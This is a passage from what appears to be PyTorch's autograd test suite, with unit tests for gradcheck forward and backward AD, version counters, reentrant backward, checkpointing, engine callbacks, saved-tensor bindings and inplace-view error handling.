gradcheck(UserFn.apply, (x, y), check_forward_ad=True, check_undefined_grad=False, check_backward_ad=False,
check_batched_grad=False, check_batched_forward_grad=False)
self.assertEqual(jvp_count[0], 2) # (2) once per input
jvp_count = [0]
gradcheck(UserFn.apply, (x, y), check_forward_ad=True, check_undefined_grad=True, check_backward_ad=False,
check_batched_grad=False, check_batched_forward_grad=False)
self.assertEqual(jvp_count[0], 6) # (+4): (once with normal ZT (+1), once with efficient ZT (+1)) for each input (x2)
jvp_count = [0]
gradcheck(UserFn.apply, (x, y), check_forward_ad=True, check_undefined_grad=True, check_backward_ad=False,
check_batched_grad=False, check_batched_forward_grad=True)
self.assertEqual(jvp_count[0], 12) # (+6): (compute batch of 2 with vmap (+1), with a loop (+2)) for each input (x2)
jvp_count = [0]
# Repeat the previous test except we mark one input with requires_grad=False
# NB: _test_undefined_forward_mode is only (+1), when function has single differentiable input, not (+2)!
# Otherwise, other counts are halved.
x = torch.rand(2, dtype=torch.double, requires_grad=True)
y = torch.rand(2, dtype=torch.double, requires_grad=False)
gradcheck(UserFn.apply, (x, y), check_forward_ad=True, check_undefined_grad=True, check_backward_ad=False,
check_batched_grad=False, check_batched_forward_grad=True)
self.assertEqual(jvp_count[0], 5) # 1 + 1 + 3
def test_gradcheck_check_forward_or_backward_only(self):
"""Depending on settings for check_forward_ad and check_backward_ad, the
correct codepaths should be reached (or not reached)
"""
fwd_fail_err_msg = "FAIL FWD"
bwd_fail_err_msg = "FAIL BWD"
class UserFn(Function):
@staticmethod
def forward(ctx, foo, fwd_bad, bwd_bad):
ctx.fwd_bad = fwd_bad
ctx.bwd_bad = bwd_bad
return foo * 2
@staticmethod
def vjp(ctx, gO):
if ctx.bwd_bad:
raise RuntimeError(bwd_fail_err_msg)
else:
return 2 * gO, None, None
@staticmethod
def jvp(ctx, gI, _1, _2):
if ctx.fwd_bad:
raise RuntimeError(fwd_fail_err_msg)
else:
return 2 * gI
for fast_mode in (True, False):
for check_forward_ad in (True, False):
for check_backward_ad in (True, False):
for fwd_bad in (True, False):
for bwd_bad in (True, False):
fwd_should_fail = fwd_bad and check_forward_ad
bwd_should_fail = bwd_bad and check_backward_ad
def run():
gradcheck(UserFn.apply, (x, fwd_bad, bwd_bad), check_forward_ad=check_forward_ad,
check_backward_ad=check_backward_ad, check_undefined_grad=check_backward_ad,
check_batched_grad=check_backward_ad, fast_mode=fast_mode)
x = torch.rand(2, dtype=torch.double, requires_grad=True)
if not check_forward_ad and not check_backward_ad:
with self.assertRaisesRegex(AssertionError, "Expected at least one of"):
run()
continue
if not fwd_should_fail and not bwd_should_fail:
run()
else:
# If both fail, backward AD failure "hides" forward AD failure
if fwd_should_fail:
fail_msg = fwd_fail_err_msg
if bwd_should_fail:
fail_msg = bwd_fail_err_msg
with self.assertRaisesRegex(RuntimeError, fail_msg):
run()
def test_gradcheck_forward_ad_batched_grad(self):
x = torch.rand(2, dtype=torch.double, requires_grad=True)
# multiple inputs and outputs with non-tensors inputs
def fn1(a: torch.Tensor, b: int):
return a.clone(), a + 1
gradcheck(fn1, (x, 1), check_forward_ad=True, check_backward_ad=False, check_batched_grad=False,
check_undefined_grad=False, check_batched_forward_grad=True)
# unrelated inputs: tangent for c is None
def fn2(a: torch.Tensor, c: torch.Tensor):
return a.clone()
gradcheck(fn2, (x, x.clone()), check_forward_ad=True, check_backward_ad=False, check_batched_grad=False,
check_undefined_grad=False, check_batched_forward_grad=True)
class Fn(Function):
@staticmethod
def forward(ctx, foo):
return foo * 2
@staticmethod
def vjp(ctx, gO):
return gO * 2
@staticmethod
def jvp(ctx, gI):
torch.randn_like(gI)
return gI * 2
msg = "vmap: We do not yet support calling random operations inside of vmap"
with self.assertRaisesRegex(RuntimeError, msg):
gradcheck(Fn.apply, (x,), check_forward_ad=True, check_batched_forward_grad=True)
def test_version_counter(self):
x = torch.randn(1, 2)
# In-place op bumps version
x_saved_version = x._version
x.add_(1).add_(1)
self.assertTrue(x._version > x_saved_version)
# Differentiable view shares version counter
xz = x[:]
self.assertTrue(x._version == xz._version)
xz.add_(1)
self.assertTrue(x._version == xz._version)
# `x.data = y` preserves version counter of `x`
x_saved_version = x._version
x.data = torch.randn(2, 3)
self.assertTrue(x._version == x_saved_version)
x.add_(1)
self.assertTrue(x._version > x_saved_version)
# Make sure `x` is still using the same version counter it shares with `xz`
self.assertTrue(x._version == xz._version)
# In-place op on `xz` also updates version of `x`,
# because they share the version counter
xz.add_(1)
self.assertTrue(x._version == xz._version)
def test_set_data_tensorimpl_type(self):
# Dense tensor has impl of type `TensorImpl`, while sparse tensor has impl
# of type `SparseTensorImpl`.
x = torch.randn(1, 2)
x_s = torch.sparse_coo_tensor(torch.zeros([1, 1]), torch.ones([1]))
with self.assertRaisesRegex(RuntimeError, 'incompatible tensor type'):
x.data = x_s
def test_set_data_preserve_pyobj(self):
a = torch.randn(1, 2)
b = torch.randn(1, 2)
b_id_saved = id(b)
b.data = a
self.assertTrue(b_id_saved == id(b))
@unittest.skipIf(IS_WINDOWS, "Skipping because doesn't work for windows")
def test_thread_shutdown(self):
code = """import torch
from torch.autograd import Function
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, grad):
return grad
for shape in [(1,), ()]:
v = torch.ones(shape, requires_grad=True)
MyFunction.apply(v).backward()
"""
s = TestCase.runWithPytorchAPIUsageStderr(code)
self.assertRegex(s, "PYTORCH_API_USAGE torch.autograd.thread_shutdown")
@unittest.skipIf(IS_MACOS, "Fails with SIGBUS on macOS; https://github.com/pytorch/pytorch/issues/25941")
def test_deep_reentrant(self):
class DeepReentrant(Function):
@staticmethod
def forward(ctx, x):
with torch.enable_grad():
ctx.x = Variable(x.detach(), requires_grad=True)
ctx.x = ctx.x - 1
return ctx.x.detach()
@staticmethod
def backward(ctx, x):
if ctx.x < 0:
return x
with torch.enable_grad():
DeepReentrant.apply(ctx.x).sum().backward()
return x
# Test stack overflow escape mechanism
v = torch.tensor(2000.0, requires_grad=True)
# This will cause stack overflow if reentrant calls are handled
# in the same thread recursively
DeepReentrant.apply(v).sum().backward()
# Test stack overflow escape mechanism multiple times
# to ensure reusing workers in the pool works fine
v2 = torch.tensor(200.0, requires_grad=True)
DeepReentrant.apply(v2).sum().backward()
def test_reentrant_priority(self):
order = []
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, x):
order.append("MyFunction")
return x
class Reentrant(Function):
@staticmethod
def forward(ctx, x):
with torch.enable_grad():
ctx.x = Variable(x.detach(), requires_grad=True)
ctx.x = ctx.x - 1
return ctx.x.detach()
@staticmethod
def backward(ctx, x):
order.append("Reentrant")
if ctx.x < 0:
return x
with torch.enable_grad():
Reentrant.apply(ctx.x).backward()
return x
a = MyFunction.apply(torch.tensor(6.0, requires_grad=True))
b = Reentrant.apply(torch.tensor(9.0, requires_grad=True))
v = a * b
v.backward()
# The tasks for the Reentrant and MyFunction backward() will be added
# to the queue in the autograd engine at the same time. The backward
# for Reentrant will be executed first, which will then add other
# backward tasks to the queue. We want to ensure all the reentrant tasks
# are prioritized over the MyFunction backward task regardless of their
# sequence numbers
self.assertEqual(len(order), 11)
self.assertEqual(order.count("Reentrant"), 10)
self.assertEqual(order[-1], "MyFunction")
@slowTest
def test_checkpointing(self):
num_inp = 2000
nz_inp = 10
nz_out = 10
nz_bottleneck = 1000
# small proxy network for some complex reasoning we want to do per input
module = nn.Sequential(
nn.Linear(nz_inp, nz_bottleneck),
nn.ReLU(),
nn.Linear(nz_bottleneck, nz_inp)
)
feat_combined = []
for r in range(num_inp):
data_r = torch.empty(1, nz_inp)
data_r.uniform_()
data_r.requires_grad = True
feat_r = checkpoint(module, data_r)
feat_combined.append(feat_r)
# compute mean as a proxy for some joint reasoning
mean_combined = torch.stack(feat_combined).mean()
mean_combined.backward()
@slowTest
@parametrize("input_requires_grad", [True, False])
def test_checkpointing_without_reentrant(self, input_requires_grad):
"""
Basic test for checkpoint without reentrant autograd.
"""
num_inp = 2000
nz_inp = 10
nz_out = 10
nz_bottleneck = 1000
# small proxy network for some complex reasoning we want to do per input
module = nn.Sequential(
nn.Linear(nz_inp, nz_bottleneck),
nn.ReLU(),
nn.Linear(nz_bottleneck, nz_inp)
)
# Run model with and without checkpointing and verify gradients are
# equivalent, regardless of if inputs require grads or not.
module_copy = deepcopy(module)
feat_combined = []
feat_combined_no_checkpoint = []
for r in range(num_inp):
data_r = torch.empty(1, nz_inp)
data_r.uniform_()
data_r.requires_grad = input_requires_grad
data_r_copy = data_r.clone()
feat_r = checkpoint(module, data_r, use_reentrant=False)
feat_combined.append(feat_r)
feat_r_no_checkpoint = module_copy(data_r)
feat_combined_no_checkpoint.append(feat_r_no_checkpoint)
# compute mean as a proxy for some joint reasoning
mean_combined = torch.stack(feat_combined).mean()
mean_combined.backward()
mean_combined_no_checkpoint = torch.stack(feat_combined_no_checkpoint).mean()
mean_combined_no_checkpoint.backward()
for checkpoint_param, param in zip(module.parameters(), module_copy.parameters()):
self.assertEqual(checkpoint_param.grad, param.grad)
def test_checkpoint_valid_reset_on_error(self):
a = torch.randn(2, 2, requires_grad=True)
with self.assertRaisesRegex(Exception, "Checkpointing is not compatible with .grad()"):
b = checkpoint(torch.exp, a).sum()
torch.autograd.grad(b, (a,))
c = checkpoint(torch.exp, a).sum()
c.backward()
@parametrize("use_reentrant", [True, False])
def test_checkpointing_without_reentrant_detached_tensor(self, use_reentrant):
class NoGradModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.linear = nn.Linear(2, 2, bias=False)
self.lin2 = nn.Linear(2, 2, bias=False)
def forward(self, x):
with torch.no_grad():
return self.lin2(self.linear(x))
module = NoGradModule()
err_ctx = (
self.assertRaisesRegex(
RuntimeError,
"none of output has requires_grad=True"
)
if use_reentrant
else contextlib.suppress()
)
a = torch.randn(2, 2, requires_grad=True)
for _ in range(3):
with err_ctx:
# out does not require grad
out = checkpoint(module, a, use_reentrant=use_reentrant)
# Make loss require grad, otherwise we would run into
# "element 0 of tensors does not require grad and does not have a grad_fn"
out += a
out.sum().backward()
def test_checkpointing_without_reentrant_correct_grad(self):
"""
Verifies that correct gradients are calculated for checkpoint
without reentrant autograd, for both backward() and autograd.grad().
"""
a = torch.randn(2, 2, requires_grad=True)
b = torch.exp(a).sum()
b.backward()
b_grad = a.grad
a.grad = None
c = checkpoint(torch.exp, a, use_reentrant=False).sum()
c.backward()
c_grad = a.grad
a.grad = None
d = checkpoint(torch.exp, a, use_reentrant=False).sum()
d_grad, = torch.autograd.grad(d, (a,))
self.assertEqual(b_grad, c_grad)
self.assertEqual(b_grad, d_grad)
def test_checkpointing_without_reentrant_dataparallel(self):
"""
Verifies gradient correctness when checkpoint without reentrant autograd
is used in conjunction with DataParallel.
"""
class LinearModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.linear = nn.Linear(2, 2, bias=False)
def forward(self, inp):
return self.linear(inp)
a = torch.randn(2, 2, requires_grad=True)
if torch.cuda.is_available():
a = a.cuda()
model = LinearModule()
if torch.cuda.is_available():
model = model.cuda()
b = deepcopy(model)(a).sum()
b.backward()
b_grad = a.grad
a.grad = None
module = torch.nn.DataParallel(deepcopy(model))
c = checkpoint(module, a, use_reentrant=False).sum()
c.backward()
c_grad = a.grad
self.assertEqual(b_grad, c_grad)
def test_checkpointing_without_reentrant_parameter_used_in_an_out(self):
"""
Ensures that gradient hooks are only called once per tensor.
"""
w = torch.randn(10, 10, requires_grad=True)
count = 0
def hook(grad):
nonlocal count
count += 1
w.register_hook(hook)
x = torch.rand(10, 10, requires_grad=True)
h = w * x # Using w outside the checkpoint
out = checkpoint(lambda x: w * x, h, use_reentrant=False) # Using w inside the checkpoint
out.sum().backward()
# should only call hook once
self.assertEqual(count, 1)
def test_checkpointing_without_reentrant_arbitrary_input_output(self):
"""
Ensures checkpointing without reentrant autograd works with functions
with arbitrary input/output structures.
"""
class MyModel(torch.nn.Module):
def __init__(self):
super().__init__()
self.layer = torch.nn.Linear(5, 5, bias=False)
def forward(self, dict_input):
tensor = dict_input["tensor"]
return {
"result": self.layer(tensor)
}
model_no_checkpoint = MyModel()
model_checkpoint_without_reentrant = deepcopy(model_no_checkpoint)
inp = {
"tensor": torch.randn(5, 5)
}
out_no_checkpoint = model_no_checkpoint(inp)["result"].sum()
out_checkpoint = checkpoint(
model_checkpoint_without_reentrant,
inp,
use_reentrant=False
)["result"].sum()
self.assertEqual(out_checkpoint, out_no_checkpoint)
out_no_checkpoint.backward()
out_checkpoint.backward()
for param, checkpoint_param in zip(model_no_checkpoint.parameters(), model_checkpoint_without_reentrant.parameters()):
self.assertEqual(param.grad, checkpoint_param.grad)
def test_callback_adds_callback(self):
called = [0]
def callback_final():
called[0] += 1
def callback_adds_callback():
called[0] += 1
Variable._execution_engine.queue_callback(callback_final)
class MyFunc(Function):
@staticmethod
def forward(ctx, input):
return input
@staticmethod
@once_differentiable
def backward(ctx, grad):
Variable._execution_engine.queue_callback(callback_adds_callback)
return grad
a = torch.rand((3, 3), requires_grad=True)
b = MyFunc.apply(a)
b.sum().backward()
self.assertEqual(called[0], 2)
def _test_reentrant_with_callbacks(self, install_callbacks_in_depths):
counter = {}
counter["inner"] = 0
counter["outer"] = 0
def inc_inner_counter():
counter["inner"] += 1
def inc_outer_counter():
counter["outer"] += 1
class MyFunc(Function):
@staticmethod
def forward(ctx, input):
return input
@staticmethod
@once_differentiable
def backward(ctx, input):
if 1 in install_callbacks_in_depths:
# Add a callback to execute.
Variable._execution_engine.queue_callback(inc_inner_counter)
return input
class MyReentrantFunc(Function):
@staticmethod
def forward(ctx, input):
return input
@staticmethod
@once_differentiable
def backward(ctx, input):
if 0 in install_callbacks_in_depths:
# Add a callback to execute.
Variable._execution_engine.queue_callback(inc_outer_counter)
# Reentrant backward call.
tmp_inp = input.detach().requires_grad_()
with torch.enable_grad():
tmp_out = (MyFunc.apply(tmp_inp)).sum()
tmp_out.backward()
return input
t1 = torch.rand((3, 3), requires_grad=True)
t2 = MyReentrantFunc.apply(t1)
t3 = t2.sum()
torch.autograd.backward([t3])
return counter
def test_reentrant_with_callbacks_depth_0(self):
# Verify callback is called only once.
ret = self._test_reentrant_with_callbacks([0])
self.assertEqual(1, ret["outer"])
self.assertEqual(0, ret["inner"])
def test_reentrant_with_callbacks_depth_1(self):
# Verify callback is called only once.
ret = self._test_reentrant_with_callbacks([1])
self.assertEqual(0, ret["outer"])
self.assertEqual(1, ret["inner"])
def test_reentrant_with_callbacks_both_depths(self):
# Verify callback is called twice.
ret = self._test_reentrant_with_callbacks([0, 1])
self.assertEqual(1, ret["outer"])
self.assertEqual(1, ret["inner"])
def test_reentrant_with_leaf_variable_hook(self):
handle = None
param = torch.rand(10, requires_grad=True)
def add_gradient_penalty_to_grad(grad):
handle.remove()
old_param_grad = grad
param.grad = None
# Add some sort of gradient penalty by directly updating the gradients
with torch.enable_grad():
g = grad.detach().requires_grad_()
new_param = param.detach().requires_grad_()
out = ((g * 2) + new_param).sum()
out.backward()
res = g.grad + grad
param.grad = old_param_grad
return res
handle = param.register_hook(add_gradient_penalty_to_grad)
# Forward pass
tmp = (param * param)
loss = tmp.sum()
# Compute the gradients
loss.backward()
def test_reentrant_with_non_leaf_variable_hook(self):
handle = None
param = torch.rand(10, requires_grad=True)
def manual_increase_gradient(grad):
handle.remove()
# Add some sort of gradient penalty by directly updating the gradients
with torch.enable_grad():
g = grad.detach().requires_grad_()
out = ((g * 2) + 5).sum()
out.backward()
res = g.grad + grad
return res
# Forward pass
tmp = (param * param)
handle = tmp.register_hook(manual_increase_gradient)
loss = tmp.sum()
# Compute the gradients
loss.backward()
self.assertEqual(param.grad, 6 * param)
def test_grad_fn_attr_bindings(self):
# Check that the getter of each type returns what we want
# See `gen_autograd_functions.py` for how the getters are generated
#
# This test is only meant to check if the codegen'd bindings work
# Please help update this test if you update the names of any the fields we check!
#
a = torch.ones(1, requires_grad=True)
b = torch.ones(1, requires_grad=True)
out = torch.stack([a, b], dim=0)
self.assertEqual(out.grad_fn._saved_tensors, (a, b)) # TensorList -> Tuple[Tensor]
self.assertIsInstance(out.grad_fn._saved_tensors[0], torch.Tensor)
self.assertIsInstance(out.grad_fn._raw_saved_tensors[0], torch._C._autograd.SavedTensor)
self.assertEqual(out.grad_fn._saved_dim, 0) # int64_t -> int
self.assertIsInstance(out.grad_fn._saved_dim, int)
out.grad_fn._raw_saved_tensors[0].register_hooks(lambda x: x, lambda x: x)
out.sum().backward()
with self.assertRaisesRegex(RuntimeError, "after they have already been freed"):
out.grad_fn._saved_tensors
with self.assertRaisesRegex(RuntimeError, "after they have already been freed"):
out.grad_fn._raw_saved_tensors
self.assertEqual(out.grad_fn._saved_dim, 0)
a = torch.ones(2, 2, requires_grad=True)
indices = torch.tensor([0, 1])
out = a[:, indices]
self.assertEqual(out.grad_fn._saved_indices, (None, indices)) # c10::List<c10::optional<Tensor>> -> Tuple[Tensor?]
self.assertIsInstance(out.grad_fn._saved_indices[1], torch.Tensor)
self.assertIsInstance(out.grad_fn._raw_saved_indices[1], torch._C._autograd.SavedTensor)
self.assertEqual(out.grad_fn._saved_self_sizes, a.shape) # IntArrayRef -> Tuple[int]
self.assertIsInstance(out.grad_fn._saved_self_sizes[0], int)
out.grad_fn._raw_saved_indices[1].register_hooks(lambda x: x, lambda x: x)
with self.assertRaisesRegex(RuntimeError, "None is forbidden"):
out.grad_fn._raw_saved_indices[0].register_hooks(lambda x: x, lambda x: x)
a = torch.ones(2, 2, requires_grad=True)
out = a * a
out.grad_fn._raw_saved_self.register_hooks(lambda x: x, lambda x: x)
out.sum().backward()
with self.assertRaisesRegex(RuntimeError, "after it has been freed"):
out.grad_fn._raw_saved_self.register_hooks(lambda x: x, lambda x: x)
a = torch.ones(1, 1, 2, requires_grad=True)
out = torch.nn.functional.interpolate(a, 4, mode="linear")
self.assertEqual(out.grad_fn._saved_output_size, (4,)) # c10::optional<IntArrayRef> -> int[]?
self.assertIsInstance(out.grad_fn._saved_output_size[0], int)
self.assertEqual(out.grad_fn._saved_align_corners, False) # bool -> bool
self.assertIsInstance(out.grad_fn._saved_align_corners, bool)
self.assertIsNone(out.grad_fn._saved_scale_factors) # c10::optional<ArrayRef<double>> -> float[]?
out = torch.nn.functional.interpolate(a, scale_factor=0.5, mode="linear")
self.assertIsNone(out.grad_fn._saved_output_size)
self.assertEqual(out.grad_fn._saved_scale_factors, (0.5,))
self.assertIsInstance(out.grad_fn._saved_scale_factors[0], float)
a = torch.ones(2, 2, requires_grad=True)
out = torch.pdist(a, p=1)
self.assertEqual(out.grad_fn._saved_p, 1.) # double -> float
self.assertIsInstance(out.grad_fn._saved_p, float)
a = torch.ones(1, 1, 2, requires_grad=True)
out = torch.logit(a, 1.)
self.assertEqual(out.grad_fn._saved_eps, 1.) # c10:optional<double> -> float?
self.assertIsInstance(out.grad_fn._saved_eps, float)
out = torch.logit(a)
self.assertIsNone(out.grad_fn._saved_eps)
if torch._C.has_lapack:
a = torch.ones(1, 1, requires_grad=True)
q, r = torch.linalg.qr(a, mode="reduced")
self.assertEqual(q.grad_fn._saved_mode, "reduced") # std::string -> str
a = torch.tensor([1.], requires_grad=True)
out = torch.div(a, 2., rounding_mode="trunc")
self.assertEqual(out.grad_fn._saved_rounding_mode, "trunc") # c10::optional<std::string> -> str?
out = torch.div(a, 2., rounding_mode=None)
self.assertIsNone(out.grad_fn._saved_rounding_mode) # c10::optional<std::string> -> str?
x = torch.zeros(5, requires_grad=True)
out = torch.threshold(x, threshold=(1 + 0j), value=(1 + 0j))
self.assertIsInstance(out.grad_fn._saved_threshold, complex) # Scalar(complex double) -> complex
cfloat = torch.tensor(1 + 0j, dtype=torch.complex64)
out = torch.threshold(x, threshold=cfloat, value=(1 + 0j))
self.assertIsInstance(out.grad_fn._saved_threshold, complex) # Scalar(complex float) -> complex
out = torch.threshold(x, threshold=1., value=1.)
self.assertIsInstance(out.grad_fn._saved_threshold, float) # Scalar(floating point) -> float
out = torch.threshold(x, threshold=1, value=1)
self.assertIsInstance(out.grad_fn._saved_threshold, int) # Scalar(integral) -> int
out = torch.threshold(x, threshold=False, value=False)
self.assertIsInstance(out.grad_fn._saved_threshold, bool) # Scalar(bool) -> bool
a = torch.ones(2, 2, requires_grad=True)
out = a.as_strided((3,), (1,), 1)
self.assertEqual(out.grad_fn._saved_storage_offset, 1) # c10:optional<int64_t> -> int?
self.assertIsInstance(out.grad_fn._saved_storage_offset, int)
out = a.as_strided((3,), (1,))
self.assertIsNone(out.grad_fn._saved_storage_offset)
a = torch.ones(2, requires_grad=True)
out = torch.tanh(a)
self.assertEqual(out, out.grad_fn._saved_result) # saved variable when output
a = torch.randn(3, 5, requires_grad=True)
b = torch.tensor([1, 0, 4])
loss = nn.NLLLoss()
out = loss(a, b)
self.assertIsNone(out.grad_fn._saved_weight)
loss = nn.NLLLoss(weight=torch.ones((5,)))
out = loss(a, b)
self.assertEqual(out.grad_fn._saved_weight, torch.ones((5,))) # c10:optional<Tensor> -> Tensor?
out.sum().backward()
with self.assertRaisesRegex(RuntimeError, "after they have already been freed"):
out.grad_fn._saved_weight
def test_cant_create_saved_tensors(self):
with self.assertRaisesRegex(RuntimeError, "Trying to create a SavedTensor object from Python is forbidden"):
torch.autograd.SavedTensor()
def test_custom_function_saved_tensors(self):
def getFn(save=True):
class MyFn(Function):
@staticmethod
def forward(ctx, x):
if save:
ctx.save_for_backward(x, None)
return x
@staticmethod
def backward(ctx, g):
return g
return MyFn
a = torch.randn(5, requires_grad=True)
y = getFn(True).apply(a)
self.assertEqual((a, None), y.grad_fn.saved_tensors)
saved = y.grad_fn._raw_saved_tensors
self.assertIsInstance(saved[0], torch._C._autograd.SavedTensor)
# We can't tell the underlying tensor is None without unpacking it
self.assertIsInstance(saved[1], torch._C._autograd.SavedTensor)
# We catch that error when the user calls register_hooks on it
with self.assertRaisesRegex(RuntimeError, "None is forbidden"):
saved[1].register_hooks(lambda x: x, lambda x: x)
with self.assertRaisesRegex(TypeError, "incompatible function arguments"):
saved[0].register_hooks(lambda x: x)
with self.assertRaisesRegex(TypeError, "incompatible function arguments"):
saved[0].register_hooks(1, 1)
saved[0].register_hooks(lambda x: x, lambda x: x)
with self.assertRaisesRegex(RuntimeError, "already been set"):
saved[0].register_hooks(lambda x: x, lambda x: x)
y.sum().backward()
# Using a reference to the SavedTensor object after the
# saved variables have been released can lead to undefined behavior
del saved
with self.assertRaisesRegex(RuntimeError, "after they have already been freed"):
y.grad_fn._raw_saved_tensors
with self.assertRaisesRegex(RuntimeError, "after they have already been freed"):
y.grad_fn.saved_tensors
y = getFn(False).apply(a)
self.assertEqual(y.grad_fn.saved_tensors, ())
self.assertEqual(y.grad_fn._raw_saved_tensors, ())
def test_autograd_views_codegen(self):
# This is not necessarily the absolute correct behavior, but this is the current
# one. This test is here to make sure that any change to this behavior is detected
# and not silent. The TODOs below mark the places with unexpected behavior.
# Note that any change in these test will be BC-breaking and should be done carefully.
# This test checks the behavior of two codegen functions (view_as and unbind)
# with respect to view tracking and inplace operation on the output.
def run_test(grad_mode, requires_grad, is_view, should_raise_tuple):
def maybe_check_raise(fn, should_raise):
self.assertTrue(should_raise is None or isinstance(should_raise, str))
if should_raise is not None:
with self.assertRaisesRegex(RuntimeError, should_raise):
fn()
else:
fn()
inp = torch.rand(2, requires_grad=requires_grad).clone()
with torch.set_grad_enabled(grad_mode):
out = inp.view_as(inp)
# Are they differentiable views?
self.assertTrue(out._is_view() == is_view)
# Are inplace allowed?
maybe_check_raise(lambda: out.add_(1), should_raise_tuple[0])
inp = torch.rand(2, requires_grad=requires_grad).clone()
with torch.set_grad_enabled(grad_mode):
out = inp.unbind()
# Are they differentiable views?
self.assertTrue(out[0]._is_view() == is_view)
self.assertTrue(out[1]._is_view() == is_view)
# Are inplace allowed?
maybe_check_raise(lambda: out[0].add_(1), should_raise_tuple[1])
maybe_check_raise(lambda: out[1].add_(1), should_raise_tuple[2])
# should_raise contains None if it should not raise
# should_raise contains a string of the error if it should raise
# The 3 elements are for view_as, first output of unbind and second output of unbind
run_test(grad_mode=True, requires_grad=False, is_view=True,
should_raise_tuple=(None, None, None))
inp_change_err = "Output {} of UnbindBackward0 is a view and is being modified inplace."
run_test(grad_mode=True, requires_grad=True, is_view=True,
should_raise_tuple=(None, inp_change_err.format("0"), inp_change_err.format("1")))
leaf_grad_err = "A view was created in no_grad mode and is being modified inplace"
run_test(grad_mode=False, requires_grad=True, is_view=True,
should_raise_tuple=(leaf_grad_err, leaf_grad_err, leaf_grad_err))
run_test(grad_mode=False, requires_grad=False, is_view=True,
should_raise_tuple=(None, None, None))
def test_inplace_not_requires_grad(self):
class MyFn(torch.autograd.Function):
@staticmethod
def forward(ctx, inp):
return inp.view_as(inp)
@staticmethod
def backward(ctx, grad):
return grad
# Original Tensor does not require grad
a = torch.rand(1, 2)
# Tensor being written does require grad
b = torch.rand(1, requires_grad=True)
# Take an invalid view on 'a' that should raise an error (warns during deprecation)
view_a = MyFn.apply(a)
with self.assertRaisesRegex(RuntimeError, "This view was created inside a custom Function"):
view_a += b
# Extra test for copy_ that is a manual implementation and could be easily
# forgotten when the codegen is updated (warns during deprecation)
a = torch.rand(1, 2)
b = torch.rand(1, requires_grad=True)
view_a = MyFn.apply(a)
with self.assertRaisesRegex(RuntimeError, "This view was created inside a custom Function"):
view_a.copy_(b)
# Functions that should throw must properly throw
a = torch.rand(1, 2)
b = torch.rand(1, requires_grad=True)
view_a = a.unbind()[0]
with self.assertRaisesRegex(RuntimeError, "This view is the output of a function that returns "
"multiple views."):
view_a.copy_(b)
# Sanity check that views that should work still work
a = torch.rand(1, 2)
b = torch.rand(1, requires_grad=True)
a.select(1, 0).copy_(b)
def _do_test_autograd_simple_views_python(self, dtype):
# This is not necessarily the absolute correct behavior, but this is the current
# one. This test is here to make sure that any change to this behavior is detected
# and not silent. The TODOs below mark the places with unexpected behavior.
# Note that any change in these test will be BC-breaking and should be done carefully.
# This checks the autograd.Function behavior when we return one or multiple outputs
# while one of these is an input, a view of an input or of a temporary tensor.
# This indicator is used to track how many times the backward function was called
bw_called = [0]
# This indicator is used to check if the argument `ga` contains non-zero values
ga_nz = [False]
class IdOneOutput(Function):
@staticmethod
def forward(ctx, a, b, make_view):
if make_view:
a = a.narrow(0, 0, 2)
else:
a = a.clone()
return a
@staticmethod
def backward(ctx, ga):
bw_called[0] += 1
return ga, None, None
class IdTwoOutput(Function):
@staticmethod
def forward(ctx, a, b, make_view):
if make_view:
a = a.narrow(0, 0, 2)
else:
a = a.clone()
return a, a + b
@staticmethod
def backward(ctx, ga, gab):
bw_called[0] += 1
if ga.eq(0).all():
ga_nz[0] = False
else:
ga_nz[0] = True
return ga + gab, gab, None
class ViewOfTemp(Function):
@staticmethod
def forward(ctx, a, make_view):
ctx.save_for_backward(a)
if make_view:
a = a.narrow(0, 0, 2)
else:
a = a.clone()
b = a.clone()
return b.select(0, 0)
@staticmethod
def backward(ctx, grad):
bw_called[0] += 1
a, = ctx.saved_tensors
res = torch.zeros_like(a)
res.select(0, 0).copy_(grad)
return res, None
fn_id_to_inplace_on_view_err_msg = {
"one_output": ("Output 0 of IdOneOutputBackward is a view and is being "
"modified inplace. This view was created inside a custom Function"),
"two_output": ("Output 0 of IdTwoOutputBackward is a view and is being modified inplace."
" This view is the output of a function that returns multiple views."),
"view_of_temp": ("Output 0 of ViewOfTempBackward is a view and is being "
"modified inplace. This view was created inside a custom Function")
}
for fn_id in ["one_output", "two_output", "view_of_temp"]:
for inplace in [True, False]:
for make_view in [True, False]:
# Used for special casing the tests below
output_is_a_view = (make_view or fn_id == "view_of_temp")
def fn(a, b):
# never modify a, b inplace for gracheck
a = a.clone()
b = b.clone()
if fn_id == "two_output":
tmp1, tmp2 = IdTwoOutput.apply(a, b, make_view)
if inplace:
tmp1 += 3
tmp2 += 3
else:
tmp1 = tmp1 + 3
tmp2 = tmp2 + 3
tmp = tmp1 * tmp2
else:
if fn_id == "one_output":
tmp = IdOneOutput.apply(a, b, make_view)
else:
tmp = ViewOfTemp.apply(a + b, make_view)
if inplace:
tmp += 3
else:
tmp = tmp + 3
return tmp.sum()
a = torch.ones(2, dtype=dtype, requires_grad=True)
b = torch.ones(2, dtype=dtype, requires_grad=True)
err_msg = fn_id_to_inplace_on_view_err_msg[fn_id]
if not inplace or not output_is_a_view:
gradcheck(fn, (a, b), check_batched_grad=False)
# Was the custom backward called properly
bw_called[0] = 0
ga_nz[0] = True # For the case where the backward is called
if inplace and output_is_a_view:
with self.assertRaisesRegex(RuntimeError, err_msg):
fn(a, b)
else:
fn(a, b).backward()
expected_called = 1
expected_ga_nz = True
if output_is_a_view and inplace:
expected_called = 0
self.assertTrue(bw_called[0] == expected_called)
self.assertTrue(ga_nz[0] == expected_ga_nz)
def test_autograd_simple_views_python(self):
self._do_test_autograd_simple_views_python(torch.double)
self._do_test_autograd_simple_views_python(torch.cdouble)
def test_autograd_inplace_views_creation_meta(self):
# Tests creation_meta properly handled for inplace views
class Func(torch.autograd.Function):
@staticmethod
def forward(ctx, x):
return x.view_as(x)
@staticmethod
def backward(ctx, x):
return x
view_custom = Func.apply
def run_test(fn, fn_type, grad_mode_view, grad_mode_iview, requires_grad, error1, error2):
# This test checks the behavior of inplace-view functions when
# the views are created in grad mode or not
base = torch.rand(2, 3, requires_grad=requires_grad).clone()
# 1. Create a view with `grad_mode=grad_mode_view`
with torch.set_grad_enabled(grad_mode_view):
if fn_type == "multi_view":
inp = base.unbind()[0]
elif fn_type == "custom" :
inp = view_custom(base)
else:
inp = base.view_as(base)
# 2. Perform inplace view with `grad_mode=grad_mode_iview`
with torch.set_grad_enabled(grad_mode_iview):
